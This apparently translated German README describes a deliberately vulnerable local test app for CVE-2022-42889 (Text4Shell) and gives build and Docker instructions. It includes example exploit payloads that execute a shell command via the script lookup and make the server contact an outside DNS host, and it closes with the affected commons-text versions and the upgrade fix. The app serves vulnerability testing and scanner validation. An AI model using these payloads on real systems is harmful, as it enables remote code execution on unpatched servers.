
Proof-of-Concept-Anwendung zum Testen von CVE-2022-42889
Dies ist eine angreifbare Anwendung, die als Proof of Concept für die Schwachstelle CVE-2022-42889 entwickelt wurde.
Um dies auszuführen, benötigen Sie:
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
mvn clean install
Dadurch wird der Ordner ./target erstellt und in diesem Ordner sollte sich die JAR-Datei text4shell-poc-0.0.1-SNAPSHOT.jar befinden.
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar
Dadurch wird ein Webserver auf Ihrem localhost gestartet, der standardmäßig auf Port 8080 lauscht.
http://localhost:8080/
und Sie sollten die folgende Ausgabe sehen:
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
Beispielhafte Exploit-Payloads
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
${dns:<burp collaborator host>)}
Empfohlener URL-Encoder für eine erfolgreiche Exploit-Demonstration: https://www.urlencoder.org/.
Alternativ können Sie Docker verwenden, um dieses PoC auszuführen:
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
docker build --tag=text4shell-poc .
docker run -p 80:8080 text4shell-poc
http://localhost/
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
${dns:<burp collaborator host>)}
Empfohlener URL-Encoder für eine erfolgreiche Exploit-Demonstration: https://www.urlencoder.org/.
Alternativ können Sie die Wirksamkeit von Scanning-Tools wie text4shell-scan überprüfen
Damit Ihr Code verwundbar ist, müssen Sie:
commons-text von Version 1.5.0 bis (ausschließlich) 1.10.0 ausführenDer Fix besteht darin, Ihre Instanzen von commons-text auf Version 1.10.0 oder höher zu aktualisieren.
Bryan Smith